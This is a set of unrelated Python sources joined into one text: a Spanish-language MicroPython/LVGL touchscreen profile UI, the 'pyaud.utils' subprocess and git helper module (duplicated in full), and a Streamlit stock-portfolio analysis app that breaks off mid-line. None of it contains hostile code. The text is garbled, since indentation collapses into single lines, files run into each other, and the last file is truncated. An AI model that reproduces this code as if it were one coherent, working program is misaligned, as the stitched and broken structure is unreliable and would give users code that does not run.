    panel.set_flex_flow(lv.FLEX_FLOW.ROW)
    for user in users:
        btn = lv.btn(panel)
        btn.set_size(150, 150)
        btn.center()
        # Bind the current user via a default argument: a plain closure would
        # capture the loop variable late, so every button would open the last user.
        lv.btn.add_event_cb(btn, lambda e, u=user: profile_cb(e, u.nombre, u.icon), lv.EVENT.PRESSED, None)
        label = lv.label(btn)
label.set_text(user.nombre) label.center() group.add_obj(btn) btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: calibration_cb(e), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.PLUS) label.center() group.add_obj(btn) panel.update_snap(lv.ANIM.ON) lv.scr_load(scr) def draw_calibname_screen(new_pos): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Elegir nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo perfil") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) kb = lv.keyboard(scr) kb.add_event_cb(lambda e: calib_name_cb(e, new_pos, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(kb) lv.scr_load(scr) def draw_loading_screen(): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(95, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("C.D.P.") s = lv.spinner(scr, 1000, 60) s.set_size(100, 100) s.center() h = lv.label(scr) h.set_pos(85, 220) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Cargando...") lv.scr_load(scr)
""" pyaud.utils =========== Utility classes and functions. """ from __future__ import annotations import functools as _functools import hashlib as _hashlib import logging as _logging import os as _os import shutil as _shutil import sys as _sys from pathlib import Path as _Path from subprocess import PIPE as _PIPE from subprocess import CalledProcessError as _CalledProcessError from subprocess import Popen as _Popen from subprocess import check_output as _sp_out from typing import Any as _Any from typing import Iterable as _Iterable from typing import List as _List from typing import MutableSequence as _ABCMutableSequence from typing import Optional as _Optional from typing import Tuple as _Tuple from typing import Union as _Union import setuptools as _setuptools from object_colors import Color as _Color from . import config as _config from ._environ import TempEnvVar as _TempEnvVar from ._objects import MutableSequence as _MutableSequence from .exceptions import CommandNotFoundError as _CommandNotFoundError from .exceptions import NotARepositoryError as _NotARepositoryError from .exceptions import ( PythonPackageNotFoundError as _PythonPackageNotFoundError, ) colors = _Color() colors.populate_colors() class _STDOut(_MutableSequence): """Only except str in the stdout object.""" def insert(self, index: int, value: str) -> None: if not isinstance(value, str): raise TypeError( "stdout received as '{}': only str instances allowed".format( type(value).__name__ ) ) super().insert(index, value) class Subprocess: """Object oriented Subprocess. ``exe`` is a mandatory argument used to construct the subprocess executable. Default ``file``, ``capture``, and ``devnull`` values can be set when instantiating the object and overridden later when using ``call``. :param exe: Subprocess executable. :key loglevel: Loglevel for non-error logging. :param commands: List of positional arguments to set as attributes if not None. :key file: File path to write stream to if not None. :key capture: Collect output array. :key log: Pipe stdout to logging instead of console. :key devnull: Send output to /dev/null. :raise CommandNotFoundError: Raise if instantiated subprocess cannot exist. """ def __init__( self, exe: str, loglevel: str = "error", commands: _Optional[_Iterable[str]] = None, **kwargs: _Union[bool, str], ) -> None: if not _shutil.which(exe): raise _CommandNotFoundError(exe) self._exe = exe self._loglevel = loglevel if commands is not None: for command in commands: setattr( self, command.replace("-", "_"), _functools.partial(self.call, command), ) self._kwargs = kwargs self._stdout: _ABCMutableSequence[str] = _STDOut() self.args: _Tuple[str, ...] 
= () def __repr__(self) -> str: return f"<{self.__class__.__name__} ({self._exe})>" def _handle_stdout( self, pipeline: _Popen, **kwargs: _Union[bool, str] ) -> None: if pipeline.stdout is not None: for line in iter(pipeline.stdout.readline, b""): line = line.decode("utf-8", "ignore") file = kwargs.get("file", self._kwargs.get("file", None)) if file is not None: with open(file, "a+", encoding="utf-8") as fout: fout.write(line) elif kwargs.get("capture", self._kwargs.get("capture", False)): self._stdout.append(line.strip()) elif kwargs.get("devnull", self._kwargs.get("devnull", False)): with open(_os.devnull, "w", encoding="utf-8") as fout: fout.write(line) else: _sys.stdout.write(line) def _handle_stderr(self, pipeline: _Popen) -> None: for line in iter(pipeline.stderr.readline, b""): # type: ignore getattr(_logging.getLogger(self._exe), self._loglevel)( line.decode("utf-8", "ignore").strip() ) def _open_process(self, *args: str, **kwargs: _Union[bool, str]) -> int: # open process with ``subprocess.Popen`` # pipe stream depending on the keyword arguments provided # Log errors to file regardless # wait for process to finish and return it's exit-code pipeline = _Popen( # pylint: disable=consider-using-with [self._exe, *args], stdout=_PIPE, stderr=_PIPE ) self._handle_stdout(pipeline, **kwargs) self._handle_stderr(pipeline) return pipeline.wait() def call(self, *args: _Any, **kwargs: _Any) -> int: """Call command. Open process with ``subprocess.Popen``. Pipe stream depending on the keyword arguments provided to instance constructor or overridden through this method. If a file path is provided it will take precedence over the other options, then capture and then finally devnull. Log errors to file regardless. Wait for process to finish and return it's exit-code. :param args: Positional str arguments. :key file: File path to write stream to if not None. :key devnull: Send output to /dev/null. :key capture: Collect output array. :key suppress: Suppress errors and continue running. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ self.args = tuple( # pylint: disable=consider-using-generator [str(i) for i in args] ) _logging.getLogger(self._exe).debug("called with %s", self.args) returncode = self._open_process(*self.args, **kwargs) if returncode and not kwargs.get("suppress", False): _logging.getLogger(self._exe).error( "returned non-zero exit status %s", returncode ) raise _CalledProcessError( returncode, f"{self._exe} {" ".join(self.args)}" ) return returncode def stdout(self) -> _ABCMutableSequence[str]: """Consume accrued stdout by returning the lines of output. Assign new container to ``_stdout``. :return: List of captured stdout. """ captured, self._stdout = self._stdout, _STDOut() return captured class _Git(Subprocess): """Git commands as class attributes. @DynamicAttrs """ def __init__(self) -> None: self.commands = [ i.lstrip().split()[0] for i in _sp_out(["git", "help", "--all"]).decode().splitlines() if i.startswith(" ") ] super().__init__("git", commands=self.commands, loglevel="debug") def call(self, *args: _Any, **kwargs: _Any) -> int: """Call partial git command instantiated in superclass. :param args: Command's positional arguments. :key file: File path to write the stdout stream to. :key capture: Pipe stream to self. :key devnull: Suppress output. :key suppress: Suppress errors and continue running. :raises NotARepositoryError: If not run from within a repository. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. 
""" git_dir = _Path.cwd() / ".git" with _TempEnvVar( _os.environ, GIT_WORK_TREE=str(_Path.cwd()), GIT_DIR=str(git_dir) ): if "--bare" in args: del _os.environ["GIT_WORK_TREE"] try: return super().call(*args, **kwargs) except _CalledProcessError as err: if not git_dir.is_dir(): raise _NotARepositoryError from err raise err class HashCap: """Analyze hashes for before and after. :param file: The path of the file to hash. """ def __init__(self, file: _Path) -> None: self.file = file self.before: _Optional[str] = None self.after: _Optional[str] = None self.compare = False self.new = not self.file.is_file() def _hash_file(self) -> str: """Open the files and inspect it to get its hash. :return: Hash as a string. """ with open(self.file, "rb") as lines: _hash = _hashlib.blake2b(lines.read()) return _hash.hexdigest() def _compare(self) -> bool: """Compare two hashes in the ``snapshot`` list. :return: Boolean: True for both match, False if they don't. """ return self.before == self.after def __enter__(self) -> HashCap: if not self.new: self.before = self._hash_file() return self def __exit__(self, exc_type: _Any, exc_val: _Any, exc_tb: _Any) -> None: try: self.after = self._hash_file() except FileNotFoundError: pass self.compare = self._compare() def branch() -> _Optional[str]: """Return current Git branch if in Git repository. :return: Checked out branch or None if no parent commit or repo. """ git.symbolic_ref( # type: ignore "--short", "HEAD", suppress=True, capture=True ) stdout = git.stdout() if stdout: return stdout[-1] return None class _Files(_MutableSequence): # pylint: disable=too-many-ancestors """Index all Python files in project.""" def __init__(self) -> None: super().__init__() self._exclude: _List[str] = [] def add_exclusions(self, *exclusions: str) -> None: """Add iterable of str objects to exclude from indexing. :param exclusions: Iterable of str names to exclude from index. """ self._exclude.extend(exclusions) def populate(self) -> None: """Populate object with index of versioned Python files.""" git.ls_files(capture=True) # type: ignore self.extend( list( # prevents duplicates which might occur during a merge set( _Path.cwd() / p for p in [_Path(p) for p in git.stdout()] # exclude any basename, stem, or part of a # `pathlib.Path` path if not any(i in self._exclude for i in (*p.parts, p.stem)) # only include Python files in index and p.name.endswith(".py") ) ) ) def reduce(self) -> _List[_Path]: """Get all relevant python files starting from project root. :return: List of project's Python file index, reduced to their root, relative to $PROJECT_DIR. Contains no duplicate items so $PROJECT_DIR/dir/file1.py and $PROJECT_DIR/dir/file2.py become $PROJECT_DIR/dir but PROJECT_DIR/file1.py and $PROJECT_DIR/file2.py remain as they are. """ project_dir = _Path.cwd() return list( set( project_dir / p.relative_to(project_dir).parts[0] for p in self ) ) def args(self, reduce: bool = False) -> _Tuple[str, ...]: """Return tuple suitable to be run with starred expression. :param reduce: :func:`~pyaud.utils._Tree.reduce` :return: Tuple of `Path` objects or str repr. """ paths = list(self) if reduce: paths = self.reduce() return tuple( # pylint: disable=consider-using-generator [str(p) for p in paths] ) def get_packages() -> _List[str]: """Return list of Python package names currently in project. Prevent dot separated subdirectories (import syntax) as args are evaluated by path. Only return the parent package's name. :raises PythonPackageNotFoundError: Raised if no package can be found. 
:return: List of Python packages. """ packages = list( set( i.split(".", maxsplit=1)[0] for i in _setuptools.find_packages( # in response to an update to `setuptools` stubs: # - error: Argument "where" has incompatible type # "Path"; expected "str" where=str(_Path.cwd()), exclude=_config.toml["packages"]["exclude"], ) ) ) if not packages: raise _PythonPackageNotFoundError("no packages found") packages.sort() return packages def package() -> str: """Return name of primary Python package. :raises PythonPackageNotFoundError: Raised if no primary package can be determined. :return: Name of primary Python package. """ # at least one package will be returned or an error would have been # raised packages = get_packages() # if there is only one package then that is the default if len(packages) == 1: return packages.pop() # if there are multiple packages found then look for a configured # package name that matches one of the project's packages package_name = _config.toml["packages"].get("name") if package_name in packages: return package_name # if there are multiple packages found, and none of the above two # apply, then the package with the same name as the project root (if # it exists) is the default repo = _Path.cwd().name if repo in packages: return repo # if none of the above criteria is met then raise raise _PythonPackageNotFoundError("cannot determine primary package") files = _Files() git = _Git()
""" pyaud.utils =========== Utility classes and functions. """ from __future__ import annotations import functools as _functools import hashlib as _hashlib import logging as _logging import os as _os import shutil as _shutil import sys as _sys from pathlib import Path as _Path from subprocess import PIPE as _PIPE from subprocess import CalledProcessError as _CalledProcessError from subprocess import Popen as _Popen from subprocess import check_output as _sp_out from typing import Any as _Any from typing import Iterable as _Iterable from typing import List as _List from typing import MutableSequence as _ABCMutableSequence from typing import Optional as _Optional from typing import Tuple as _Tuple from typing import Union as _Union import setuptools as _setuptools from object_colors import Color as _Color from . import config as _config from ._environ import TempEnvVar as _TempEnvVar from ._objects import MutableSequence as _MutableSequence from .exceptions import CommandNotFoundError as _CommandNotFoundError from .exceptions import NotARepositoryError as _NotARepositoryError from .exceptions import ( PythonPackageNotFoundError as _PythonPackageNotFoundError, ) colors = _Color() colors.populate_colors() class _STDOut(_MutableSequence): """Only except str in the stdout object.""" def insert(self, index: int, value: str) -> None: if not isinstance(value, str): raise TypeError( "stdout received as '{}': only str instances allowed".format( type(value).__name__ ) ) super().insert(index, value) class Subprocess: """Object oriented Subprocess. ``exe`` is a mandatory argument used to construct the subprocess executable. Default ``file``, ``capture``, and ``devnull`` values can be set when instantiating the object and overridden later when using ``call``. :param exe: Subprocess executable. :key loglevel: Loglevel for non-error logging. :param commands: List of positional arguments to set as attributes if not None. :key file: File path to write stream to if not None. :key capture: Collect output array. :key log: Pipe stdout to logging instead of console. :key devnull: Send output to /dev/null. :raise CommandNotFoundError: Raise if instantiated subprocess cannot exist. """ def __init__( self, exe: str, loglevel: str = "error", commands: _Optional[_Iterable[str]] = None, **kwargs: _Union[bool, str], ) -> None: if not _shutil.which(exe): raise _CommandNotFoundError(exe) self._exe = exe self._loglevel = loglevel if commands is not None: for command in commands: setattr( self, command.replace("-", "_"), _functools.partial(self.call, command), ) self._kwargs = kwargs self._stdout: _ABCMutableSequence[str] = _STDOut() self.args: _Tuple[str, ...] 
= () def __repr__(self) -> str: return f"<{self.__class__.__name__} ({self._exe})>" def _handle_stdout( self, pipeline: _Popen, **kwargs: _Union[bool, str] ) -> None: if pipeline.stdout is not None: for line in iter(pipeline.stdout.readline, b""): line = line.decode("utf-8", "ignore") file = kwargs.get("file", self._kwargs.get("file", None)) if file is not None: with open(file, "a+", encoding="utf-8") as fout: fout.write(line) elif kwargs.get("capture", self._kwargs.get("capture", False)): self._stdout.append(line.strip()) elif kwargs.get("devnull", self._kwargs.get("devnull", False)): with open(_os.devnull, "w", encoding="utf-8") as fout: fout.write(line) else: _sys.stdout.write(line) def _handle_stderr(self, pipeline: _Popen) -> None: for line in iter(pipeline.stderr.readline, b""): # type: ignore getattr(_logging.getLogger(self._exe), self._loglevel)( line.decode("utf-8", "ignore").strip() ) def _open_process(self, *args: str, **kwargs: _Union[bool, str]) -> int: # open process with ``subprocess.Popen`` # pipe stream depending on the keyword arguments provided # Log errors to file regardless # wait for process to finish and return it's exit-code pipeline = _Popen( # pylint: disable=consider-using-with [self._exe, *args], stdout=_PIPE, stderr=_PIPE ) self._handle_stdout(pipeline, **kwargs) self._handle_stderr(pipeline) return pipeline.wait() def call(self, *args: _Any, **kwargs: _Any) -> int: """Call command. Open process with ``subprocess.Popen``. Pipe stream depending on the keyword arguments provided to instance constructor or overridden through this method. If a file path is provided it will take precedence over the other options, then capture and then finally devnull. Log errors to file regardless. Wait for process to finish and return it's exit-code. :param args: Positional str arguments. :key file: File path to write stream to if not None. :key devnull: Send output to /dev/null. :key capture: Collect output array. :key suppress: Suppress errors and continue running. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. """ self.args = tuple( # pylint: disable=consider-using-generator [str(i) for i in args] ) _logging.getLogger(self._exe).debug("called with %s", self.args) returncode = self._open_process(*self.args, **kwargs) if returncode and not kwargs.get("suppress", False): _logging.getLogger(self._exe).error( "returned non-zero exit status %s", returncode ) raise _CalledProcessError( returncode, f"{self._exe} {' '.join(self.args)}" ) return returncode def stdout(self) -> _ABCMutableSequence[str]: """Consume accrued stdout by returning the lines of output. Assign new container to ``_stdout``. :return: List of captured stdout. """ captured, self._stdout = self._stdout, _STDOut() return captured class _Git(Subprocess): """Git commands as class attributes. @DynamicAttrs """ def __init__(self) -> None: self.commands = [ i.lstrip().split()[0] for i in _sp_out(["git", "help", "--all"]).decode().splitlines() if i.startswith(" ") ] super().__init__("git", commands=self.commands, loglevel="debug") def call(self, *args: _Any, **kwargs: _Any) -> int: """Call partial git command instantiated in superclass. :param args: Command's positional arguments. :key file: File path to write the stdout stream to. :key capture: Pipe stream to self. :key devnull: Suppress output. :key suppress: Suppress errors and continue running. :raises NotARepositoryError: If not run from within a repository. :raises CalledProcessError: If error occurs in subprocess. :return: Exit status. 
""" git_dir = _Path.cwd() / ".git" with _TempEnvVar( _os.environ, GIT_WORK_TREE=str(_Path.cwd()), GIT_DIR=str(git_dir) ): if "--bare" in args: del _os.environ["GIT_WORK_TREE"] try: return super().call(*args, **kwargs) except _CalledProcessError as err: if not git_dir.is_dir(): raise _NotARepositoryError from err raise err class HashCap: """Analyze hashes for before and after. :param file: The path of the file to hash. """ def __init__(self, file: _Path) -> None: self.file = file self.before: _Optional[str] = None self.after: _Optional[str] = None self.compare = False self.new = not self.file.is_file() def _hash_file(self) -> str: """Open the files and inspect it to get its hash. :return: Hash as a string. """ with open(self.file, "rb") as lines: _hash = _hashlib.blake2b(lines.read()) return _hash.hexdigest() def _compare(self) -> bool: """Compare two hashes in the ``snapshot`` list. :return: Boolean: True for both match, False if they don't. """ return self.before == self.after def __enter__(self) -> HashCap: if not self.new: self.before = self._hash_file() return self def __exit__(self, exc_type: _Any, exc_val: _Any, exc_tb: _Any) -> None: try: self.after = self._hash_file() except FileNotFoundError: pass self.compare = self._compare() def branch() -> _Optional[str]: """Return current Git branch if in Git repository. :return: Checked out branch or None if no parent commit or repo. """ git.symbolic_ref( # type: ignore "--short", "HEAD", suppress=True, capture=True ) stdout = git.stdout() if stdout: return stdout[-1] return None class _Files(_MutableSequence): # pylint: disable=too-many-ancestors """Index all Python files in project.""" def __init__(self) -> None: super().__init__() self._exclude: _List[str] = [] def add_exclusions(self, *exclusions: str) -> None: """Add iterable of str objects to exclude from indexing. :param exclusions: Iterable of str names to exclude from index. """ self._exclude.extend(exclusions) def populate(self) -> None: """Populate object with index of versioned Python files.""" git.ls_files(capture=True) # type: ignore self.extend( list( # prevents duplicates which might occur during a merge set( _Path.cwd() / p for p in [_Path(p) for p in git.stdout()] # exclude any basename, stem, or part of a # `pathlib.Path` path if not any(i in self._exclude for i in (*p.parts, p.stem)) # only include Python files in index and p.name.endswith(".py") ) ) ) def reduce(self) -> _List[_Path]: """Get all relevant python files starting from project root. :return: List of project's Python file index, reduced to their root, relative to $PROJECT_DIR. Contains no duplicate items so $PROJECT_DIR/dir/file1.py and $PROJECT_DIR/dir/file2.py become $PROJECT_DIR/dir but PROJECT_DIR/file1.py and $PROJECT_DIR/file2.py remain as they are. """ project_dir = _Path.cwd() return list( set( project_dir / p.relative_to(project_dir).parts[0] for p in self ) ) def args(self, reduce: bool = False) -> _Tuple[str, ...]: """Return tuple suitable to be run with starred expression. :param reduce: :func:`~pyaud.utils._Tree.reduce` :return: Tuple of `Path` objects or str repr. """ paths = list(self) if reduce: paths = self.reduce() return tuple( # pylint: disable=consider-using-generator [str(p) for p in paths] ) def get_packages() -> _List[str]: """Return list of Python package names currently in project. Prevent dot separated subdirectories (import syntax) as args are evaluated by path. Only return the parent package's name. :raises PythonPackageNotFoundError: Raised if no package can be found. 
:return: List of Python packages. """ packages = list( set( i.split(".", maxsplit=1)[0] for i in _setuptools.find_packages( # in response to an update to `setuptools` stubs: # - error: Argument "where" has incompatible type # "Path"; expected "str" where=str(_Path.cwd()), exclude=_config.toml["packages"]["exclude"], ) ) ) if not packages: raise _PythonPackageNotFoundError("no packages found") packages.sort() return packages def package() -> str: """Return name of primary Python package. :raises PythonPackageNotFoundError: Raised if no primary package can be determined. :return: Name of primary Python package. """ # at least one package will be returned or an error would have been # raised packages = get_packages() # if there is only one package then that is the default if len(packages) == 1: return packages.pop() # if there are multiple packages found then look for a configured # package name that matches one of the project's packages package_name = _config.toml["packages"].get("name") if package_name in packages: return package_name # if there are multiple packages found, and none of the above two # apply, then the package with the same name as the project root (if # it exists) is the default repo = _Path.cwd().name if repo in packages: return repo # if none of the above criteria is met then raise raise _PythonPackageNotFoundError("cannot determine primary package") files = _Files() git = _Git()
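# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not from pyaud's docs). It
# exercises the stream routing described in ``Subprocess.call`` -- ``file``
# takes precedence over ``capture``, which takes precedence over ``devnull``
# -- and the before/after hashing done by ``HashCap``. The ``echo``
# executable and the ``setup.py`` path are assumptions.
#
#   from pathlib import Path
#   from pyaud.utils import HashCap, Subprocess
#
#   echo = Subprocess("echo")
#   echo.call("hello", capture=True)          # buffered instead of printed
#   assert list(echo.stdout()) == ["hello"]   # consuming also resets buffer
#
#   with HashCap(Path("setup.py")) as cap:
#       Path("setup.py").touch()              # mtime changes, contents do not
#   assert cap.compare                        # blake2b digests still match
# ---------------------------------------------------------------------------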
#Libraries import base64 import datetime from io import BytesIO, StringIO import os import pandas as pd import streamlit as st import plotly import yfinance as yf from technical_analysis import download_data, portfolio_return, benchmark_return, wealth_plot,accumulated_return_plot, drawdawn_plot, allocation_plot, day_returns_plot from fundamental_analysis import market_cap, annual_financials, quarter_income_statement, calculate_ratios, market_cap_plot, bar_plot, line_plot #Downloader def export_plotly_image_link(fig,path_file): mybuff = StringIO() fig.write_html(mybuff, include_plotlyjs='cdn') mybuff = BytesIO(mybuff.getvalue().encode()) b64 = base64.b64encode(mybuff.read()).decode() #plotly.offline.plot(fig, filename=path_file, auto_open=False) href = f'<a href="data:text/html;charset=utf-8;base64, {b64}" download="{os.path.basename(path_file)}">Download plot</a>' return href def export_plotly_image_button(fig,path_file): plotly.offline.plot(fig, filename = path_file, auto_open=True) def save_all(path_file): with open(path_file, 'a') as f: f.write(fig_wealth_plot.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_accumulated_return.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_drawdawn.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_day_returns.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_allocation.to_html(full_html=False, include_plotlyjs='cdn')) ######################STREAMLIT APP############## st.set_page_config(layout="wide",initial_sidebar_state='expanded',page_title="Stock Portfolio Tracker") st.write('<style>div.row-widget.stRadio > div{flex-direction:row;}</style>', unsafe_allow_html=True) st.write("# PORTFOLIO ANALYSIS ") ##################PROXY OPTION############### st.markdown("### Behind proxy server") proxy_option = st.radio(label='Proxy server', options=['No','Yes']) ##########TECHNICAL OR FUNDAMENTAL########### analysis_type = st.sidebar.radio("Choose an info type",('Technical', 'Fundamental')) ###PORTFOLIO COMPOSITION### st.markdown("### Select the stocks that will make up your portfolio") sp500 = pd.read_csv("./dat/all_tickers.csv")[['Symbol']] symbols = sp500['Symbol'].sort_values().tolist() big_fish = ['AAPL','AMZN','GOOGL','MSFT'] portfolio_companies = st.multiselect(label="Selected stocks", options = list(symbols), default=big_fish) ###BENCHMARK OPTIONALITY AND PORTFOLIO ALLOCATION### if analysis_type== 'Technical': ###DATE RANGE### today = datetime.date.today() min_value = today - datetime.timedelta(days=20000) before = today - datetime.timedelta(days=2555) start_date = st.sidebar.date_input('Start date', before, min_value=min_value) end_date = st.sidebar.date_input('End date', today, min_value=min_value) if start_date > end_date: st.sidebar.error('Error: End date must fall after start date.') ###INITIAL INVESTMENT### st.markdown("### Select your initial investment ($)") initial_investment = st.slider(label='Initial investment ($)', key='Initial investment', value=10_000, min_value=1_000, max_value=100_000, step=1_000) ###BENCHMARK OPTIONALITY### st.markdown("### Benchmark index") benchmark_option = st.radio(label='Benchmark', options=['None','S&P 500', 'Nasdaq Composite', 'Both']) ###PORTFOLIO ALLOCATION### st.sidebar.markdown("Do you want an equally balanced portfolio?") allocation = st.sidebar.selectbox('Select', ['Yes','No']) if len(portfolio_companies)>=1: if allocation=='Yes': company_weighs = [1 / len(portfolio_companies)] * len(portfolio_companies) else: st.sidebar.markdown("Select the percentage
allocated to each company (%)") company_weigh_balanced = 1/len(portfolio_companies) company_weighs = [] for company in portfolio_companies: company_weigh = st.sidebar.number_input(company, value = company_weigh_balanced, min_value=0.0, max_value=1.0, step=0.01) company_weighs.append(company_weigh) else: pass ###APP## proxy_server = os.getenv('PROXY_SERVER') if st.button("Analyze portfolio",key='1'): if len(portfolio_companies)==0: st.warning("Introduce at least a company ticker") else: ########################################################FUNDAMENTAL################################### if analysis_type == "Fundamental": with st.spinner(text='In progress: it may take a few seconds.'): #####################################################DATA########################################################### ##### TICKERS ###### dict_tickers = {} for ticker in portfolio_companies: dict_tickers[ticker] = yf.Ticker(ticker) ######### MARKET CAPITALIZATION ############ df_market_cap = market_cap(dict_tickers, proxy_option) market_cap_columns = df_market_cap.loc[:, df_market_cap.columns.str.contains('Market_cap')].columns df_market_cap = df_market_cap[market_cap_columns] ######## QUARTER INCOME STATEMENT ############ df_quarter_income_statement,df_annual_income_statement_forecasted = quarter_income_statement(dict_tickers) ######### ANNUAL FINANCIALS ################ df_annual_financials = annual_financials(dict_tickers) df_annual_financials = pd.concat([df_annual_income_statement_forecasted,df_annual_financials]).reset_index(drop=['index']) df_annual_financials = pd.concat([df_annual_financials,df_market_cap],axis=1) df_annual_financials = df_annual_financials.fillna(method='bfill') ####### RATIOS ########################### df_complete_annual = calculate_ratios(df_annual_financials,dict_tickers) #st.write(df_complete_annual) #######################################################PLOTS############################################################# ##################MARKET CAP METRICS################ st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> MARKET CAP METRICS </h1>", unsafe_allow_html=True) fig_market_cap, dict_stock_color = market_cap_plot(df_complete_annual, period='Annually', substring="Market_cap", y_title="Market cap ($)", general_title="Market cap (B$) over time") st.plotly_chart(fig_market_cap) #################REVENUE METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> REVENUE METRICS </h1>", unsafe_allow_html=True) #REVENUE PLOT# fig_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color,period = 'Annually', substring="Revenue",y_title="Revenue (B$)",general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_annual) # REVENUE NORMALIZED PLOT# fig_normalized_revenue_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_revenue", y_title="Normalized revenue", general_title = "Normalized revenue since beginning of period") st.plotly_chart(fig_normalized_revenue_plot_annual) # P/S PLOT# fig_price_to_sales = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/S", y_title = "P/S multiple", general_title = "P/S since beginning of period") st.plotly_chart(fig_price_to_sales) #REVENUE GROWTH PLOT# #fig_growth_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', # substring="Growth_revenue", y_title="Revenue growth", general_title = "Revenue 
growth year-over-year") #st.plotly_chart(fig_growth_revenue_plot_annual) # REVENUE PLOT (QUARTER)# fig_revenue_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Revenue", y_title="Revenue (B$)", general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_quarter) ################GROSS PROFIT METRICS################# st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> GROSS PROFIT METRICS </h1>", unsafe_allow_html=True) # GROSS PROFIT PLOT# fig_gross_profit_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit year-over-year") st.plotly_chart(fig_gross_profit_plot_annual) # GROSS PROFIT NORMALIZED PLOT# fig_normalized_gross_profit_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_gross_profit", y_title="Normalized gross profit", general_title="Normalized gross profit since beginning of period") st.plotly_chart(fig_normalized_gross_profit_plot_annual) # P/GROSS_PROFIT PLOT# fig_price_to_gross_profit = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/G", y_title="P/Gross profit multiple", general_title="P/Gross profit since beginning of period") st.plotly_chart(fig_price_to_gross_profit) # GROSS PROFIT GROWTH PLOT# #fig_growth_gross_profit_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_gross_profit", y_title="Gross profit growth", general_title="Gross profit growth year-over-year") #st.plotly_chart(fig_growth_gross_profit_plot_annual) # GROSS PROFIT PLOT (QUARTER)# fig_gross_profit_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit quarter-over-quarter") st.plotly_chart(fig_gross_profit_plot_quarter) ##############NET INCOME METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> NET INCOME METRICS </h1>", unsafe_allow_html=True) #NET INCOME PLOT# fig_income_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', substring="Net_income",y_title="Net income ($)",general_title="Net income year-over-year") st.plotly_chart(fig_income_plot_annual) # NET INCOME NORMALIZED PLOT# fig_normalized_net_income_plot_annual = line_plot(df_complete_annual,dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_net_income", y_title="Normalized net income",general_title = "Normalized net income since beginning of period") st.plotly_chart(fig_normalized_net_income_plot_annual) #P/E PLOT# fig_price_to_earnings = line_plot(df_complete_annual, dict_stock_color=dict_stock_color,period='Annually', substring="P/E", y_title = "P/E multiple", general_title="P/E since beginning of period") st.plotly_chart(fig_price_to_earnings) # NET INCOME GROWTH PLOT# #fig_growth_income_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_net_income", y_title="Net income growth", general_title="Net income growth year-over-year") #st.plotly_chart(fig_growth_income_plot_annual) # NET INCOME PLOT (QUARTER)# fig_income_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color,period='Quarterly', 
substring="Net_income",y_title="Net income ($)",general_title="Net income quarter-over-quarter") st.plotly_chart(fig_income_plot_quarter) ############RESEARCH & DEVELOPMENT METRICS##### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> RESEARCH & DEVELOPMENT METRICS </h1>", unsafe_allow_html=True) #RESEARCH & DEVELOPMENT# fig_research_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="R&D/revenue", y_title="R&D/Revenue ratio", general_title="R&D/Revenue ratio year-over-year") st.plotly_chart(fig_research_plot_annual) ##############DEBT METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> DEBT METRICS </h1>", unsafe_allow_html=True) # CURRENT RATIO PLOT# fig_current_ratio = line_plot(df_complete_annual, period="Annually",dict_stock_color=dict_stock_color, substring="Current_ratio",y_title="Current ratio", general_title="Current ratio year-over-year") st.plotly_chart(fig_current_ratio) # DEBT-TO-EQUITY PLOT# fig_debt_to_equity = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/equity",y_title="Debt/Equity ratio", general_title="Debt/Equity ratio year-over-year") st.plotly_chart(fig_debt_to_equity) # DEBT-TO-EBIT PLOT# fig_debt_to_ebit = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/ebit", y_title="Debt/Ebit ratio", general_title="Debt/Ebit ratio year-over-year") st.plotly_chart(fig_debt_to_ebit) #stock = yf.Ticker("AYX") #if proxy_option == 